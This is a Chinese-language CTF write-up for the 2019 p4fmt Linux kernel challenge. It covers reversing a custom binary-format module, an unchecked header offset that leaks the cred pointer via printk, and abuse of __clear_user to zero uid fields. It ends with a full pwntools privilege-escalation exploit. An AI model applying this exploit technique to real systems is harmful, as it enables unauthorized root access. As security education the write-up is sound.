p4fmt writeup

前言

p4fmt 是今年 3 月時,由 p4 第一次主辦的 CONFidence CTF Teaser 2019 中的題目,雖然現在解完了覺得相對其他 kernel 的題目這算是比較新手友善的,但當時因為比賽時間只有一天並且之前沒有 kernel exploit 的經驗,就卡在一些細節上沒解出來。賽後想找些時間來看,不過大三下實在是比較忙碌,所以就一路拖到上週才好好坐下來解這題

初見

題目解壓縮後有三個檔案,分別是 kernel image, initramfs 以及執行 qemu 的腳本

root:p4fmt/ $ tree
.
├── bzImage
├── initramfs.cpio.gz
└── run.sh

0 directories, 3 files
user:p4fmt/ $ cat run.sh
#!/bin/bash
qemu-system-x86_64 -kernel ./bzImage \
                -initrd ./initramfs.cpio.gz \
                -nographic \
                -append "console=ttyS0" \

總之先跑起來看看

====================
p4fmt
====================

Kernel challs are always a bit painful.
No internet access, no SSH, no file copying.

You're stuck with copy pasting base64'd (sometimes static) ELFs.
But what if there was another solution?

We've created a lightweight, simple binary format for your
pwning pleasure. It's time to prove your skills.

/ $ ls -al
total 20
drwxr-xr-x   12 root     0              300 Mar 15  2019 .
drwxr-xr-x   12 root     0              300 Mar 15  2019 ..
drwxr-xr-x    2 root     0             7880 Mar 14  2019 bin
drwxr-xr-x    2 root     0               80 Oct  1 07:58 dev
drwxr-xr-x    2 root     0               60 Mar 15  2019 etc
-rw-------    1 root     0               20 Mar 15  2019 flag
drwxr-xr-x    3 root     0               60 Mar 15  2019 home
-rwxr--r--    1 root     0              520 Mar 15  2019 init
-rw-r--r--    1 root     0             8384 Mar 15  2019 p4fmt.ko <--
dr-xr-xr-x   35 root     0                0 Oct  1 07:58 proc
drwx------    2 root     0               40 Mar 14  2019 root
drwxr-xr-x    2 root     0               40 Mar 14  2019 sbin
dr-xr-xr-x   12 root     0                0 Oct  1 07:58 sys
drwxrwxrwx    2 root     0               40 Mar 15  2019 tmp
drwxr-xr-x    4 root     0               80 Mar 14  2019 usr

馬上就會發現根目錄中有個 p4fmt.ko kernel module,沒意外就是本題的漏洞所在
lsmod 可以確認他確實有被載入到 kernel 中

/ $ lsmod
p4fmt 16384 0 - Live 0x0000000000000000 (O)

因為 p4fmt.ko 在 initramfs 中,我們可以利用 cat initramfs.cpio.gz | gzip -d | cpio -idv 把檔案解出來

接著看看 linux kernel 版本,發現是當時最新的 5.0.0 版號

/ $ cat /proc/version
Linux version 5.0.0 (chivay@outcast) (gcc version 8.2.1 20181127 (GCC)) #2 SMP Fri Mar 15 09:13:12 CET 2019

分析

拿到 p4fmt.ko 之後就直接拖進 IDA 分析

從 module 的 init function 可以瞭解到,這支 kernel module 會在 kernel 中註冊一個 binary format,就像是 linux kernel 預設註冊的 ELF 格式一樣,所以若是格式正確,kernel 就會載入這種特殊格式的執行檔

__int64 p4fmt_init()
{
  _register_binfmt(&p4format, 1LL);
  return 0LL;
}

接著觀察用於檢查檔案格式是否正確和處理載入的函式 load_p4_binary

__int64 __fastcall load_p4_binary(__int64 a1)
{
    signed __int64 v1; // rcx
    const char *v2; // rsi
    __int64 elfbase; // r12
    __int64 v4; // rbx
    _BYTE *bufptr; // rdi
    unsigned __int64 v6; // r14
    bool v7; // cf
    bool v8; // zf
    __int64 v9; // r13
    unsigned int v10; // ebp
    char version; // al
    signed __int64 entry_point; // r12
    signed __int64 v14; // rsi
    unsigned __int64 v15; // rax
    __int64 *segment_hdr; // r12
    __int64 v17; // ST00_8
    signed __int64 prot; // r14
    unsigned __int64 addr; // r15
    __int64 offset; // r9
    __int64 len; // rdx
    __int64 v22; // rcx
    __int64 v23; // r8

    v1 = 2LL;
    v2 = "P4";
    elfbase = a1 + 0x48;
    v4 = a1;
    bufptr = (_BYTE *)(a1 + 0x48);
    v6 = __readgsqword((unsigned __int64)&current_task);
    v7 = 0;
    v8 = 0;
    v9 = *(_QWORD *)(v6 + 672);
    do                                // check "P4"
    {
        if ( !v1 )
            break;
        v7 = (const unsigned __int8)*v2 < *bufptr;
        v8 = *v2++ == *bufptr++;
        --v1;
    }
    while ( v8 );
    if ( (!v7 && !v8) != v7 )
        return (unsigned int)-8;      // ENOEXEC
    JUMPOUT(*(_BYTE *)(v4 + 0x4A), 0, load_p4_binary_cold_2);
    if ( *(_BYTE *)(v4 + 0x4B) > 1u )   
        return (unsigned int)-22;     // EINVAL
    v10 = flush_old_exec(v4);
    if ( !v10 )
    {
        *(_DWORD *)(v6 + 128) = 0x800000;
        setup_new_exec(v4);
        version = *(_BYTE *)(v4 + 0x4B);
        if ( version )
        {
            if ( version != 1 )
                return (unsigned int)-22;
            if ( *(_DWORD *)(v4 + 0x4C) )      // segment counts
            {
                segment_hdr = (__int64 *)(*(_QWORD *)(v4 + 0x50) + elfbase);// no check, use it to leak address in printk
                do
                {
                    v17 = *segment_hdr;
                    prot = *segment_hdr & 7;
                    addr = *segment_hdr & 0xFFFFFFFFFFFFF000LL;
                    printk(
                        "vm_mmap(load_addr=0x%llx, length=0x%llx, offset=0x%llx, prot=%d)\n",
                        addr,
                        segment_hdr[1],
                        segment_hdr[2],
                        prot);
                    offset = segment_hdr[2];
                    len = segment_hdr[1];
                    if ( v17 & 8 )
                    {
                        vm_mmap(0LL, addr, len, (unsigned __int8)prot, 2LL, offset);
                        printk("clear_user(addr=0x%llx, length=0x%llx)\n", *segment_hdr, segment_hdr[1], v22, v23);
                        _clear_user(*segment_hdr, segment_hdr[1]);
                    }
                    else
                    {
                        vm_mmap(*(_QWORD *)(v4 + 8), addr, len, (unsigned __int8)prot, 2LL, offset);
                    }
                    ++v10;
                    segment_hdr += 3;
                }
                while ( *(_DWORD *)(v4 + 0x4C) > v10 );
            }
        }
        else
        {
            entry_point = -12LL;
            if ( (unsigned __int64)vm_mmap(
                               *(_QWORD *)(v4 + 8),
                               *(_QWORD *)(v4 + 80),
                               4096LL,
                               *(_QWORD *)(v4 + 80) & 7LL,
                               2LL,
                               0LL) > 0xFFFFFFFFFFFFF000LL )
            {
LABEL_12:
                install_exec_creds(v4);
                set_binfmt(&p4format);
                v14 = 0x7FFFFFFFF000LL;
                v15 = __readgsqword((unsigned __int64)&current_task);
                if ( *(_QWORD *)v15 & 0x20000000 )
                {
                    v14 = 0xC0000000LL;
                    if ( !(*(_BYTE *)(v15 + 131) & 8) )
                        v14 = 0xFFFFE000LL;
                }
                v10 = setup_arg_pages(v4, v14, 0LL);
                if ( !v10 )
                {
                    finalize_exec(v4);
                    start_thread(
                        v9 + 0x3F58,
                        entry_point,
                        *(_QWORD *)(*(_QWORD *)(__readgsqword((unsigned __int64)&current_task) + 256) + 40LL));
                }
                return v10;
            }
        }
        entry_point = *(_QWORD *)(v4 + 0x58);
        goto LABEL_12;
    }
    return v10;
}

1 到 57 行左右是用於檢查 P4 格式執行檔格式是否正確,30 行處的 bufptr 指標便是指向欲處理的 binary 的前 128 byte (execve 時會讀取執行檔的前 128 byte 作為 header),在 59 行確認使用者是否有需要自行決定載入地址的 segment,接著便從提供的資訊做 vm_mmap

逆向之後可以推出 P4 執行檔的格式如下:

struct segment_hdr {
    __int64 load_address;
    __int64 length;
    __int64 offset;
}

struct P4 {
    const char magic[3] = { 'P', '4', '\0' };
    __int8 version = 1;
    __int32 segment_count;
    __int64 segment_header_offset;
    __int64 elf_entry;
    
    ... after segment_header_offset bytes ...
    
    struct segment_hdr seg[segment_count];
    
    char data[];
}

問題發生在第 59, 61 行處,if (*(_DWORD *)(v4 + 0x4C))segment_hdr = (__int64 *)(*(_QWORD *)(v4 + 0x50) + elfbase); 程式在計算 segment_header 的位置時沒有對提供的 segment count 及 offset 進行檢查,造成接下來 vm_mmap 的處理時可以被 printk 洩漏任意地址任意長度的 kernel memory

那究竟可以 leak 出甚麼呢?
得要先知道 v4 變數是甚麼,透過查閱 kernel source code 可以得知 103 行 install_exec_creds 的參數 v4 為 struct linux_binprm

/*
 * This structure is used to hold the arguments that are used when loading binaries.
 */
struct linux_binprm {
	char buf[BINPRM_BUF_SIZE];
#ifdef CONFIG_MMU
	struct vm_area_struct *vma;
	unsigned long vma_pages;
#else
# define MAX_ARG_PAGES	32
	struct page *page[MAX_ARG_PAGES];
#endif
	struct mm_struct *mm;
	unsigned long p; /* current top of mem */
	unsigned long argmin; /* rlimit marker for copy_strings() */
	unsigned int
		/*
		 * True after the bprm_set_creds hook has been called once
		 * (multiple calls can be made via prepare_binprm() for
		 * binfmt_script/misc).
		 */
		called_set_creds:1,
		/*
		 * True if most recent call to the commoncaps bprm_set_creds
		 * hook (due to multiple prepare_binprm() calls from the
		 * binfmt_script/misc handlers) resulted in elevated
		 * privileges.
		 */
		cap_elevated:1,
		/*
		 * Set by bprm_set_creds hook to indicate a privilege-gaining
		 * exec has happened. Used to sanitize execution environment
		 * and to set AT_SECURE auxv for glibc.
		 */
		secureexec:1;
#ifdef __alpha__
	unsigned int taso:1;
#endif
	unsigned int recursion_depth; /* only for search_binary_handler() */
	struct file * file;
	struct cred *cred;	/* new credentials */
	int unsafe;		/* how unsafe this exec is (mask of LSM_UNSAFE_*) */
	unsigned int per_clear;	/* bits to clear in current->personality */
	int argc, envc;
	const char * filename;	/* Name of binary as seen by procps */
	const char * interp;	/* Name of the binary really executed. Most
				   of the time same as filename, but could be
				   different for binfmt_{misc,script} */
	unsigned interp_flags;
	unsigned interp_data;
	unsigned long loader, exec;

	struct rlimit rlim_stack; /* Saved RLIMIT_STACK used during exec. */
} __randomize_layout;

其中一個重要的元素便是紀錄該 process 身分資訊的 struct cred *cred,只要將 offset 設為 bufcred 的差值就可以 leak 出來了才對,但是如果直接填入該 offset 進行 leak 的話,會發現 leak 出來的指標明顯是錯的,為甚麼呢?

不知道各位在逆向的時候有沒有注意到,雖然 buf 這個元素在結構中排第一個,
但是檢查 magic string “P4” 時 bufptr 的 offset 居然是 0x48 (bufptr = (_BYTE *)(a1 + 0x48);)

所以在這裡對於新手(就我啦)來說最需要注意到的細節是最下方的 __randomize_layout

這是一個於 2017 年被導入到 linux kernel 中的防護機制,屬於 KSPP(Kernel Self Protection Project) 的一部分,其功能是在編譯時期透過一個亂數種子,將有標記 __randomize_layout 的結構體中的元素作亂序排列,進而使攻擊者難以找出元素對應的地址,詳細可以參考這篇 LWN.net 上的文章 Randomizing structure layout

也就是在沒有 debug info 的情況下,我們只能從程式碼中找出哪裡使用到該變數,藉此得知它的位置

所以只好開 gdb 做 kernel debugging 了(笑)

動態分析 kernel module

為了讓動態分析更輕鬆,有一些前置步驟要做

修改 initramfs 中的 init 腳本,將 setsid cttyhack su pwn 改為 sh 讓我們可以直接拿到 root shell,這是為了直接定位 p4fmt.ko 被載入到 kernel 中的地址

用下方指令重新打包 initramfs
(小提醒: --format=newc 一定要加,不然 qemu 掛載時會跳 kernel panic)

find . | cpio -ov --format=newc | gzip -9 > ../modified.cpio.gz

接著在 run.sh 裡新增 -s 參數,這樣會讓 qemu 在 localhost:1234 開啟 gdb debug server,同時也記得將 -initrd 參數的值改為剛剛重新打包過的 initramfs

最後,我們需要將 bzimage 中的 vmlinux 執行檔解出來才能 debug,這個步驟可以交給 linux kernel source 中的腳本 extract-vmlinux 來完成

./extract-vmlinux bzImage > vmlinux

qemu 跑起來 gdb 開起來,可以開始 debug 啦XD
拿到 root shell 先 lsmod 看 p4fmt.ko 被載入的地址

/ # lsmod
p4fmt 16384 0 - Live 0xffffffffc03c4000 (O)

再來透過 gdb 接入 kernel,載入 p4fmt 的 symbol

$ gdb vmlinux
gef> target remote :1234
gef> add-symbol-file p4fmt.ko 0xffffffffc03c4000

接著為了找出 cred 的地址,鎖定這個一臉就是會用到 cred 的 function install_exec_creds,查閱 fs/exec.c 可以得知其中的 commit_creds 函式會使用到 bprm->cred

/*
 * install the new credentials for this executable
 */
void install_exec_creds(struct linux_binprm *bprm)
{
	security_bprm_committing_creds(bprm);

	commit_creds(bprm->cred);
	bprm->cred = NULL;

	/*
	 * Disable monitoring for regular users
	 * when executing setuid binaries. Must
	 * wait until new credentials are committed
	 * by commit_creds() above
	 */
	if (get_dumpable(current->mm) != SUID_DUMP_USER)
		perf_event_exit_task(current);
	/*
	 * cred_guard_mutex must be held at least to this point to prevent
	 * ptrace_attach() from altering our determination of the task's
	 * credentials; any time after this it may be unlocked.
	 */
	security_bprm_committed_creds(bprm);
	mutex_unlock(&current->signal->cred_guard_mutex);
}

程式在第二個 function call (commit_creds(bprm->cred)) 前存取 [rbx+0xe0] 將值取出,所以 cred 的 offset 就是 0xe0 了

0xffffffff90789ec0                  push   rbx
0xffffffff90789ec1                  mov    rbx, rdi
0xffffffff90789ec4                  call   0xffffffff90897aa0
0xffffffff90789ec9                  mov    rdi, QWORD PTR [rbx+0xe0]
0xffffffff90789ed0                  call   0xffffffff90673d30

到這步我們就可以利用 segment header offset 來 leak bprm->cred

現在問題是要怎麼利用這個 leak 出來的地址呢,看回 load_p4_binary 第 80 行

if ( v17 & 8 )
{
  vm_mmap(0LL, addr, len, (unsigned __int8)prot, 2LL, offset);
  printk("clear_user(addr=0x%llx, length=0x%llx)\n", *segment_hdr, segment_hdr[1], v22, v23);
  _clear_user(*segment_hdr, segment_hdr[1]);
}

只要給定的 load address 有設定一個 flag (0x8),便會透過 __clear_user 對該段記憶體資料寫 0
問題是雖然 load address 是我們可控的,那究竟能不能藉由這個函式對 kernel space 操作呢,函式的名稱叫 __clear_user 耶?

一樣翻閱 source code arch/x86/lib/usercopy_64.c

/*
 * Zero Userspace
 */

unsigned long __clear_user(void __user *addr, unsigned long size)
{
	long __d0;
	might_fault();
	/* no memory constraint because it doesn't change any memory gcc knows
	   about */
	stac();
	asm volatile(
		"	testq  %[size8],%[size8]\n"
		"	jz     4f\n"
		"0:	movq $0,(%[dst])\n"
		"	addq   $8,%[dst]\n"
		"	decl %%ecx ; jnz   0b\n"
		"4:	movq  %[size1],%%rcx\n"
		"	testl %%ecx,%%ecx\n"
		"	jz     2f\n"
		"1:	movb   $0,(%[dst])\n"
		"	incq   %[dst]\n"
		"	decl %%ecx ; jnz  1b\n"
		"2:\n"
		".section .fixup,\"ax\"\n"
		"3:	lea 0(%[size1],%[size8],8),%[size8]\n"
		"	jmp 2b\n"
		".previous\n"
		_ASM_EXTABLE_UA(0b, 3b)
		_ASM_EXTABLE_UA(1b, 2b)
		: [size8] "=&c"(size), [dst] "=&D" (__d0)
		: [size1] "r"(size & 7), "[size8]" (size / 8), "[dst]"(addr));
	clac();
	return size;
}

答案是可以的,雖然原始碼每一處都告訴開發者這是用來對 userspace 操作的函式,但是並沒有對參數做檢查,想到這就可以開始寫 exploit 了

Exploit

想法是拆成兩個 binary 來完成,先利用越界存取漏洞 leak cred,再以 __clear_user 將 cred 上的各種 uid 清零,也就是使 uid = 0(root)

struct cred 結構體中有多個不同功能的 uid,雖然因為前面提到的隨機化我們並不知道對應的 offset,這裡只需透過 gdb 將記憶體內容印出來觀察即可 uid = 0x3e8 = 1000(pwn)

gef>  x/20gx $rdi
0xffffa0a7474e0cc0:     0x0000000000000000      0xffffa0a74764a440
0xffffa0a7474e0cd0:     0x0000000000000000      0x00000000000003e8
0xffffa0a7474e0ce0:     0x0000000000000000      0x0000000000000000
0xffffa0a7474e0cf0:     0xffffffff000003e8      0x000003e80000003f
0xffffa0a7474e0d00:     0x0000000000000000      0x000003e800000000
0xffffa0a7474e0d10:     0x000003e8000003e8      0x00000000000003e8
0xffffa0a7474e0d20:     0x0000000000000000      0xffffa0a7474e0b40
0xffffa0a7474e0d30:     0x000003e800000000      0x0000000000000000
0xffffa0a7474e0d40:     0x0000000000000001      0x0000000000000000
0xffffa0a7474e0d50:     0x0000000000000000      0x0000000000000000

不過在實作上遇到兩個問題:

  • 每次 leak cred 的地址不同
  • 第一次 leak cred 的地址和第二次使用的地址不相同

第一點在我觀察了一陣子後發現它是會重複的,每五次一個循環;但是第二點的地址偶爾會相同,或是在同一個循環內,觀察了很久還是沒有搞懂,最後只好嘗試暴力解了 (我對 kernel 分配記憶體的機制不熟,還請瞭解的大佬解惑)

最終的 exploit script:

#!/usr/bin/env python
from pwn import *
import sys

context.arch = 'amd64'
#context.log_level = 'debug'

segment_hdr_off = 0x30
text_off = 0xa0
load_addr = 0x800000
length = 0x800
RX = 0x5
clear = 0x8

r = remote('localhost', 4000)

def pwnp4():
    p4_leak = 'P4\x00'
    p4_leak += p8(1) # version number
    p4_leak += p32(1) # number of segments
    p4_leak += p64(0xb0) # offset of segment header, use it to leak cred ptr in struct linux_binprm
    p4_leak += p64(0) # elf entry
    p4_leak = 'echo \'' + b64e(p4_leak) + '\' | base64 -d > /tmp/leak; chmod +x /tmp/leak; /tmp/leak'

    r.sendlineafter('/ $ ', p4_leak)
    r.recvuntil('length=')
    cred = int(r.recvuntil(',', drop=True), 16)
    print 'leak cred:', hex(cred)

    egid = cred + 0x18

    p4_pwn = 'P4\x00'
    p4_pwn += p8(1) # version number
    p4_pwn += p32(2) # number of segments
    p4_pwn += p64(segment_hdr_off) # offset of segment header
    p4_pwn += p64(load_addr + text_off) # elf entry
    p4_pwn = p4_pwn.ljust(segment_hdr_off, '\x00')

    # segment header (addr, len, offset)
    # 1
    p4_pwn += p64(load_addr | RX)
    p4_pwn += p64(length) # align up to 0x1000
    p4_pwn += p64(0) # caution: offset must be a multiple of the page size (see `man mmap`)
    # 2
    p4_pwn += p64(egid | clear)
    p4_pwn += p64(0x44)
    p4_pwn += p64(0)

    p4_pwn = p4_pwn.ljust(text_off, '\x00')

    p4_pwn += asm(shellcraft.sh())
    p4_pwn = 'echo \'' + b64e(p4_pwn) + '\' | base64 -d > /tmp/pwn; chmod +x /tmp/pwn;'

    r.sendlineafter('/ $ ', p4_pwn)

    for _ in range(10):
        r.sendline('/tmp/pwn')
        r.recvuntil('/ ')
        sh = r.recvn(2)

        if sh[0] == '#':
            r.interactive()
            sys.exit()

for _ in range(10):
    try:
        pwnp4()
    except KeyboardInterrupt:
        sys.exit()
    except Exception:
        continue